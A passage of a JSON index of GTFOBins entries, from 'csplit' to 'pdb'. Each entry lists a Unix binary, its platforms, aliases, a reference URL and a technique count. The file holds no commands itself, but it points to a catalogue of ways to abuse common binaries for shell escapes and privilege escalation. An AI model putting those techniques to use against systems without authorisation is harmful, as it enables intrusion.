csplit/"],"count":6},{"id":"gtfo:csvtool","name":"csvtool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/csvtool/"],"count":9},{"id":"gtfo:ctr","name":"ctr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ctr/"],"count":2},{"id":"gtfo:cupsfilter","name":"cupsfilter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cupsfilter/"],"count":3},{"id":"gtfo:curl","name":"curl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/curl/"],"count":21},{"id":"gtfo:cut","name":"cut","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/cut/"],"count":3},{"id":"gtfo:dash","name":"dash","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dash/"],"count":6},{"id":"gtfo:date","name":"date","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/date/"],"count":3},{"id":"gtfo:dc","name":"dc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dc/"],"count":3},{"id":"gtfo:dd","name":"dd","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dd/"],"count":6},{"id":"gtfo:debugfs","name":"debugfs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/debugfs/"],"count":3},{"id":"gtfo:dhclient","name":"dhclient","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dhclient/"],"count":2},{"id":"gtfo:dialog","name":"dialog","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dialog/"],"count":3},{"id":"gtfo:diff","name":"diff","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/diff/"],"count":6},{"id":"gtfo:dig","name":"dig","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dig/"],"count":3},{"id":"gtfo:distcc","name":"distcc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/distcc/"],"count":3},{"id":"gtfo:dmesg","name":"dmesg","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmesg/"],"count":6},{"id":"gtfo:dmidecode","name":"dmidecode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmidecode/"],"count":1},{"id":"gtfo:dmsetup","name":"dmsetup","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dmsetup/"],"count":3},{"id":"gtfo:dnf","name":"dnf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dnf/"],"count":1},{"id":"gtfo:dnsmasq","name":"dnsmasq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dnsmasq/"],"count":3},{"id":"gtfo:doas","name":"doas","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/doas/"],"count":2},{"id":"gtfo:docker","name":"docker","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/docker/"],"count":12},{"id":"gtfo:dos2unix","name":"dos2unix","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dos2unix/"],"count":6},{"id":"gtfo:dosbox","name":"dosbox","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dosbox/"],"count":9},{"id":"gtfo:dotnet","name":"dotnet","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dotnet/"],"count":4},{"id":"gtfo:dpkg","name":"dpkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dpkg/"],"count":4},{"id":"gtfo:dstat","name":"dstat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dstat/"],"count":2},{"id":"gtfo:dvips","name":"dvips","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/dvips/"],"count":3},{"id":"gtfo:easy_install","name":"easy_install","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/easy_install/"],"count":2},{"id":"gtfo:easyrsa","name":"easyrsa","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/easyrsa/"],"count":3},{"id":"gtfo:eb","name":"eb","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/eb/"],"count":2},{"id":"gtfo:ed","name":"ed","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["red"],"references":["https://gtfobins.github.io/gtfobins/ed/"],"count":9},{"id":"gtfo:efax","name":"efax","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/efax/"],"count":2},{"id":"gtfo:egrep","name":"egrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/egrep/"],"count":3},{"id":"gtfo:elvish","name":"elvish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/elvish/"],"count":9},{"id":"gtfo:emacs","name":"emacs","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/emacs/"],"count":6},{"id":"gtfo:enscript","name":"enscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/enscript/"],"count":3},{"id":"gtfo:env","name":"env","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/env/"],"count":3},{"id":"gtfo:eqn","name":"eqn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/eqn/"],"count":3},{"id":"gtfo:espeak","name":"espeak","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/espeak/"],"count":3},{"id":"gtfo:ex","name":"ex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ex/"],"count":6},{"id":"gtfo:exiftool","name":"exiftool","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/exiftool/"],"count":12},{"id":"gtfo:expand","name":"expand","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/expand/"],"count":3},{"id":"gtfo:expect","name":"expect","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/expect/"],"count":6},{"id":"gtfo:facter","name":"facter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/facter/"],"count":4},{"id":"gtfo:fail2ban-client","name":"fail2ban-client","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fail2ban-client/"],"count":2},{"id":"gtfo:fastfetch","name":"fastfetch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fastfetch/"],"count":9},{"id":"gtfo:ffmpeg","name":"ffmpeg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ffmpeg/"],"count":3},{"id":"gtfo:fgrep","name":"fgrep","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fgrep/"],"count":3},{"id":"gtfo:file","name":"file","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/file/"],"count":6},{"id":"gtfo:find","name":"find","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/find/"],"count":9},{"id":"gtfo:finger","name":"finger","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/finger/"],"count":6},{"id":"gtfo:firejail","name":"firejail","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/firejail/"],"count":2},{"id":"gtfo:fish","name":"fish","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fish/"],"count":3},{"id":"gtfo:flock","name":"flock","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/flock/"],"count":3},{"id":"gtfo:fmt","name":"fmt","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fmt/"],"count":6},{"id":"gtfo:fold","name":"fold","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fold/"],"count":3},{"id":"gtfo:forge","name":"forge","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/forge/"],"count":3},{"id":"gtfo:fping","name":"fping","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fping/"],"count":3},{"id":"gtfo:ftp","name":"ftp","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ftp/"],"count":9},{"id":"gtfo:fzf","name":"fzf","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/fzf/"],"count":6},{"id":"gtfo:gawk","name":"gawk","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["nawk"],"references":["https://gtfobins.github.io/gtfobins/gawk/"],"count":15},{"id":"gtfo:gcc","name":"gcc","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["c89","c99","cc","g++"],"references":["https://gtfobins.github.io/gtfobins/gcc/"],"count":8},{"id":"gtfo:gcloud","name":"gcloud","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gcloud/"],"count":3},{"id":"gtfo:gcore","name":"gcore","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gcore/"],"count":3},{"id":"gtfo:gdb","name":"gdb","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gdb/"],"count":10},{"id":"gtfo:gem","name":"gem","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gem/"],"count":8},{"id":"gtfo:genie","name":"genie","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/genie/"],"count":3},{"id":"gtfo:genisoimage","name":"genisoimage","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/genisoimage/"],"count":6},{"id":"gtfo:getent","name":"getent","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/getent/"],"count":2},{"id":"gtfo:ghc","name":"ghc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ghc/"],"count":2},{"id":"gtfo:ghci","name":"ghci","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ghci/"],"count":2},{"id":"gtfo:gimp","name":"gimp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gimp/"],"count":2},{"id":"gtfo:ginsh","name":"ginsh","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ginsh/"],"count":3},{"id":"gtfo:git","name":"git","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/git/"],"count":17},{"id":"gtfo:gnuplot","name":"gnuplot","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gnuplot/"],"count":3},{"id":"gtfo:go","name":"go","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/go/"],"count":10},{"id":"gtfo:grc","name":"grc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/grc/"],"count":2},{"id":"gtfo:grep","name":"grep","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/grep/"],"count":3},{"id":"gtfo:gtester","name":"gtester","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gtester/"],"count":6},{"id":"gtfo:guile","name":"guile","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/guile/"],"count":3},{"id":"gtfo:gzip","name":"gzip","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/gzip/"],"count":4},{"id":"gtfo:hashcat","name":"hashcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hashcat/"],"count":2},{"id":"gtfo:head","name":"head","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/head/"],"count":3},{"id":"gtfo:hexdump","name":"hexdump","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["hd"],"references":["https://gtfobins.github.io/gtfobins/hexdump/"],"count":3},{"id":"gtfo:hg","name":"hg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hg/"],"count":3},{"id":"gtfo:highlight","name":"highlight","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/highlight/"],"count":3},{"id":"gtfo:hping3","name":"hping3","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/hping3/"],"count":4},{"id":"gtfo:iconv","name":"iconv","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iconv/"],"count":6},{"id":"gtfo:iftop","name":"iftop","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iftop/"],"count":3},{"id":"gtfo:install","name":"install","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/install/"],"count":2},{"id":"gtfo:ionice","name":"ionice","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ionice/"],"count":3},{"id":"gtfo:ip","name":"ip","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ip/"],"count":6},{"id":"gtfo:iptables-save","name":"iptables-save","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/iptables-save/"],"count":1},{"id":"gtfo:irb","name":"irb","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/irb/"],"count":2},{"id":"gtfo:ispell","name":"ispell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ispell/"],"count":3},{"id":"gtfo:java","name":"java","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/java/"],"count":2},{"id":"gtfo:jjs","name":"jjs","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jjs/"],"count":10},{"id":"gtfo:joe","name":"joe","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/joe/"],"count":3},{"id":"gtfo:join","name":"join","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/join/"],"count":3},{"id":"gtfo:journalctl","name":"journalctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/journalctl/"],"count":2},{"id":"gtfo:jq","name":"jq","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jq/"],"count":3},{"id":"gtfo:jrunscript","name":"jrunscript","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jrunscript/"],"count":11},{"id":"gtfo:jshell","name":"jshell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jshell/"],"count":6},{"id":"gtfo:jtag","name":"jtag","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/jtag/"],"count":2},{"id":"gtfo:julia","name":"julia","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/julia/"],"count":15},{"id":"gtfo:knife","name":"knife","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/knife/"],"count":2},{"id":"gtfo:ksshell","name":"ksshell","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ksshell/"],"count":3},{"id":"gtfo:ksu","name":"ksu","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ksu/"],"count":1},{"id":"gtfo:kubectl","name":"kubectl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/kubectl/"],"count":5},{"id":"gtfo:last","name":"last","source":"GTFOBins","platform":["Linux"],"aliases":["lastb"],"references":["https://gtfobins.github.io/gtfobins/last/"],"count":3},{"id":"gtfo:latex","name":"latex","source":"GTFOBins","platform":["Linux"],"aliases":["xelatex"],"references":["https://gtfobins.github.io/gtfobins/latex/"],"count":9},{"id":"gtfo:latexmk","name":"latexmk","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/latexmk/"],"count":6},{"id":"gtfo:ld.so","name":"ld.so","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ld.so/"],"count":3},{"id":"gtfo:ldconfig","name":"ldconfig","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"count":3},{"id":"gtfo:less","name":"less","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/less/"],"count":24},{"id":"gtfo:lftp","name":"lftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lftp/"],"count":3},{"id":"gtfo:links","name":"links","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/links/"],"count":3},{"id":"gtfo:ln","name":"ln","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ln/"],"count":1},{"id":"gtfo:loginctl","name":"loginctl","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/loginctl/"],"count":2},{"id":"gtfo:logrotate","name":"logrotate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/logrotate/"],"count":7},{"id":"gtfo:logsave","name":"logsave","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/logsave/"],"count":3},{"id":"gtfo:look","name":"look","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/look/"],"count":3},{"id":"gtfo:lp","name":"lp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lp/"],"count":3},{"id":"gtfo:ltrace","name":"ltrace","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ltrace/"],"count":7},{"id":"gtfo:lua","name":"lua","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lua/"],"count":21},{"id":"gtfo:lualatex","name":"lualatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lualatex/"],"count":3},{"id":"gtfo:luatex","name":"luatex","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/luatex/"],"count":3},{"id":"gtfo:lwp-download","name":"lwp-download","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lwp-download/"],"count":8},{"id":"gtfo:lwp-request","name":"lwp-request","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lwp-request/"],"count":2},{"id":"gtfo:lxd","name":"lxd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/lxd/"],"count":4},{"id":"gtfo:m4","name":"m4","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/m4/"],"count":9},{"id":"gtfo:mail","name":"mail","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mail/"],"count":6},{"id":"gtfo:make","name":"make","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/make/"],"count":9},{"id":"gtfo:man","name":"man","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/man/"],"count":9},{"id":"gtfo:mawk","name":"mawk","source":"GTFOBins","platform":["Linux"],"aliases":["awk"],"references":["https://gtfobins.github.io/gtfobins/mawk/"],"count":9},{"id":"gtfo:minicom","name":"minicom","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/minicom/"],"count":6},{"id":"gtfo:more","name":"more","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/more/"],"count":6},{"id":"gtfo:mosh-server","name":"mosh-server","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mosh-server/"],"count":1},{"id":"gtfo:mosquitto","name":"mosquitto","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mosquitto/"],"count":3},{"id":"gtfo:mount","name":"mount","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mount/"],"count":1},{"id":"gtfo:msfconsole","name":"msfconsole","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msfconsole/"],"count":2},{"id":"gtfo:msgattrib","name":"msgattrib","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgattrib/"],"count":3},{"id":"gtfo:msgcat","name":"msgcat","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgcat/"],"count":3},{"id":"gtfo:msgconv","name":"msgconv","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgconv/"],"count":3},{"id":"gtfo:msgfilter","name":"msgfilter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgfilter/"],"count":6},{"id":"gtfo:msgmerge","name":"msgmerge","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msgmerge/"],"count":3},{"id":"gtfo:msguniq","name":"msguniq","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/msguniq/"],"count":3},{"id":"gtfo:mtr","name":"mtr","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mtr/"],"count":2},{"id":"gtfo:multitime","name":"multitime","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/multitime/"],"count":3},{"id":"gtfo:mutt","name":"mutt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mutt/"],"count":2},{"id":"gtfo:mv","name":"mv","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mv/"],"count":5},{"id":"gtfo:mypy","name":"mypy","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mypy/"],"count":4},{"id":"gtfo:mysql","name":"mysql","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/mysql/"],"count":6},{"id":"gtfo:nano","name":"nano","source":"GTFOBins","platform":["Linux","macOS"],"aliases":["pico"],"references":["https://gtfobins.github.io/gtfobins/nano/"],"count":12},{"id":"gtfo:nasm","name":"nasm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nasm/"],"count":3},{"id":"gtfo:nc","name":"nc","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nc/"],"count":18},{"id":"gtfo:ncdu","name":"ncdu","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ncdu/"],"count":3},{"id":"gtfo:ncftp","name":"ncftp","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ncftp/"],"count":3},{"id":"gtfo:needrestart","name":"needrestart","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/needrestart/"],"count":2},{"id":"gtfo:neofetch","name":"neofetch","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/neofetch/"],"count":4},{"id":"gtfo:nft","name":"nft","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nft/"],"count":2},{"id":"gtfo:nginx","name":"nginx","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nginx/"],"count":5},{"id":"gtfo:nice","name":"nice","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nice/"],"count":3},{"id":"gtfo:nl","name":"nl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nl/"],"count":3},{"id":"gtfo:nm","name":"nm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nm/"],"count":3},{"id":"gtfo:nmap","name":"nmap","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nmap/"],"count":12},{"id":"gtfo:node","name":"node","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/node/"],"count":22},{"id":"gtfo:nohup","name":"nohup","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nohup/"],"count":6},{"id":"gtfo:npm","name":"npm","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/npm/"],"count":6},{"id":"gtfo:nroff","name":"nroff","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nroff/"],"count":4},{"id":"gtfo:nsenter","name":"nsenter","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/nsenter/"],"count":3},{"id":"gtfo:ntpdate","name":"ntpdate","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/ntpdate/"],"count":3},{"id":"gtfo:octave","name":"octave","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/octave/"],"count":9},{"id":"gtfo:od","name":"od","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/od/"],"count":3},{"id":"gtfo:opencode","name":"opencode","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/opencode/"],"count":5},{"id":"gtfo:openssl","name":"openssl","source":"GTFOBins","platform":["Linux","macOS"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openssl/"],"count":21},{"id":"gtfo:openvpn","name":"openvpn","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openvpn/"],"count":6},{"id":"gtfo:openvt","name":"openvt","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/openvt/"],"count":1},{"id":"gtfo:opkg","name":"opkg","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/opkg/"],"count":1},{"id":"gtfo:pandoc","name":"pandoc","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pandoc/"],"count":9},{"id":"gtfo:passwd","name":"passwd","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/passwd/"],"count":1},{"id":"gtfo:paste","name":"paste","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/paste/"],"count":3},{"id":"gtfo:pax","name":"pax","source":"GTFOBins","platform":["Linux"],"aliases":[],"references":["https://gtfobins.github.io/gtfobins/pax/"],"count":3},{"id":"gtfo:pdb","name":"pdb","source":"GTFOBins","platform":["Linux"],"aliases":[],"ref